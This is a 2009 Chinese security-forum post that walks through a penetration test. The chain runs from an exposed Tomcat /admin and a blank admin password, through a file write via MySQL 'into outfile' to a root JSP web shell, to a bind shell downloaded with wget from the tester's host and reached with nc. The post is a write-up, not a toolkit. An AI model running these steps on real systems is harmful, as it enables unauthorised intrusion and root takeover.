Board logo

标题: 一次渗透测试的过程 [打印本页]

作者: 冰绿茶    时间: 2009-1-31 17:45     标题: 一次渗透测试的过程

一次渗透测试的过程
一次渗透测试的过程
前一段时间接了一个渗透测试的任务,过程有点意思,所以简单写一下,以供参考。

我们检测的三台主机中两台为Linux系统,一台为AIX系统。还有一台是边界路由器。
目标网络的主机通过地址转换来提供对外访问,内部使用172.16.*.*地址段(这些信息是测试之后才得到的,开始并不知道)。在边界路由器后面还有一台Cisco PIX 525
(515?)对三台主机进行保护,只允许外部用户连接不同主机的部分端口,例如80,25,110等等。

根据我们的检测,Cisco PIX防火墙的过滤规则设置还是比较严密的,基本上没有多余端口允许外部用户访问。


在对xx.xx.xx.2和xx.xx.xx.3进行了端口扫描之后,发现只有通过xx.xx.xx.3的WEB服务进行进行间接攻击。首先检查TCP/80端口的服务,我们发现新闻搜索的功能是在另外一个端口8070提供的。直接输入:
http://yyy.yyy.yyy:8070/

之后,得到了一个系统管理登录页面,简单地测试了一下,输入test/test作为用户/口令,似乎认证成功,但最后并不能进入下一个页面。我们发现这个端口正在运行Tomcat 3.1,而这个版本存在一个安全漏洞,缺省/admin目录是可以访问的。
在输入:
http://yyy.yyy.yyy:8070/admin
之后,我们果然看到了”Tomcat AdministrationTools”的页面, 通过点击”Context Admin”这个链接,我们可以对Tomcat的Context进行管理,例如查看、增加、删除Context。这个Context有点类似虚拟目录,于是我们可以增加一个context, 例如”/tt”,将它的文档根目录设置为”/”,这样当我们访问

http://yyy.yyy.yyy:8070/tt

时看到的就是系统根目录的列表了!进一步可以查看任意目录里面的任意文件。
由于Tomcat是以root身份运行的,所以可以查看任意系统文件,例如/etc/passwd和/etc/shadow。根据口令文件进行密码破解后发现系统中的两个用户test和root都使用了非常简单的口令:123456。尽管外部用户无法直接访问telnet服务,这些口令还是应当被重设为更为强壮的字符串利用这个漏洞我们基本上可以查看整个系统,但是由于无法写入数据,威胁似乎还不是很大。

于是我们将注意力转移到论坛和聊天室。这两个服务一个监听在8080,一个监听在8888端口。直接http://yyy.yyy.yyy:8080/, 我们看到了Tomcat410的欢迎页面,点击左边的管理链接:
http://yyy.yyy.yyy:8080/admin ;,我们得到了一个登录页面,虽然我们不知道口令,但是通过前面8070端口的漏洞,我们找到了Tomcat保存这些口令的文件,得到了管理用户名为admin,口令为空。于是我们就可以对整个Tomcat服务器进行管理了。

但这仍然不足以让我们在系统上运行命令。于是我们继续检查聊天室所在的8888端口。
这个端口运行的是apache 1.3.26 +php 42。开始没有发现什么问题,突然想到前面发现的两个漏洞都与/admin有关,这个端口上会不会也有这个目录呢?在输入这个目录之后我们惊奇地发现,我们进入了一个phpMyadmin的管理界面。我们可以对整个数据库进行任意操作。由于数据库是MySQL,它支持从本地操作系统读入或者写入数据。因此我们在test库中建立了一个简单的表,然后添加一条记录,记录的内容就是一个php文件的内容,我们想写入一个php文件,然后利用php调用外部命令的方法来执行命令。我们利用select tt into outfile /path/test.php from kk(感谢小许提供技术支持)

这样的命令来将数据库中的内容写到一个php文件里,但由于mysql是以mysql用户身份运行的,无法写到apache的目录中。所以这次尝试失败了。

我们又想到了一个方法,利用8070端口的漏洞我们可以访问任意系统文件,而8070端口是由tomcat提供服务的,如果我们可以设法在系统中创建一个.jsp文件,就可以远
程访问这个jsp文件,它将被tomcat处理并运行。如果这个.jsp文件中的内容是一段执行系统命令代码,就可以运行系统命令了。

于是我们又重新编写了一段可以执行系统命令的jsp代码,将其输入测试表中,再次利用into outfile方法将其内容写到/tmp/test.jsp文件中,然后访问下列链接:
http://yyy.yyy.yyy:8070/tt/tmp/test.jsp

(感谢watercloud提供技术支持)

我们发现我们指定的命令被执行了!而且是以root身份执行的。这意味着我们已经完全控制了整个系统。

当然,通过cgi执行命令还是不如有一个shell来得方便。当然最简单的方法就是开一个xterm连回到我们的Xwindows即可。但是我们是用的NAT,连不进来。听说工程部有个IP是可以外部访问的,就搬了笔记本过去准备用,结果在一切都准备好之后,发现对方居然关机了


第二天,我决定还是用老办法,开个shell算了。首先要找到一个可以外部访问的端口。
但是防火墙并不允许外部访问所有的端口,经过一番测试,发现所有允许访问的端口都被占用着。仔细看了看进程,发现chatserver占了4个端口,每一个端口对应一个
聊天室,而且目前也没有人在使用这些聊天室。所以我就先kill掉其中一个进程,这样就可以将在其对应的端口上绑定一个shell了。

通过jsp执行命令来下载/编译/运行我们的bindshell:
wgethttp://ourhost/bindshell.c
gcc -o bindshell bindshell.c
nohup ./bindshell

现在就可以连接我们的shell了:
nc yyy.yyy.yyy 9100

现在我们已经在防火墙的后面了,因此可以直接访问内网了。通过扫描发现存在如下内部主机:

172.161 Cisco PIX
172.16.1.2 mail
172.16.1.3 web
172.16.1.4 oracle db

进一步测试还可以入侵其中的oracle服务器。至此,此次渗透测试基本结束。




欢迎光临 【3.A.S.T】网络安全爱好者 (http://3ast.com/) Powered by Discuz! 7.2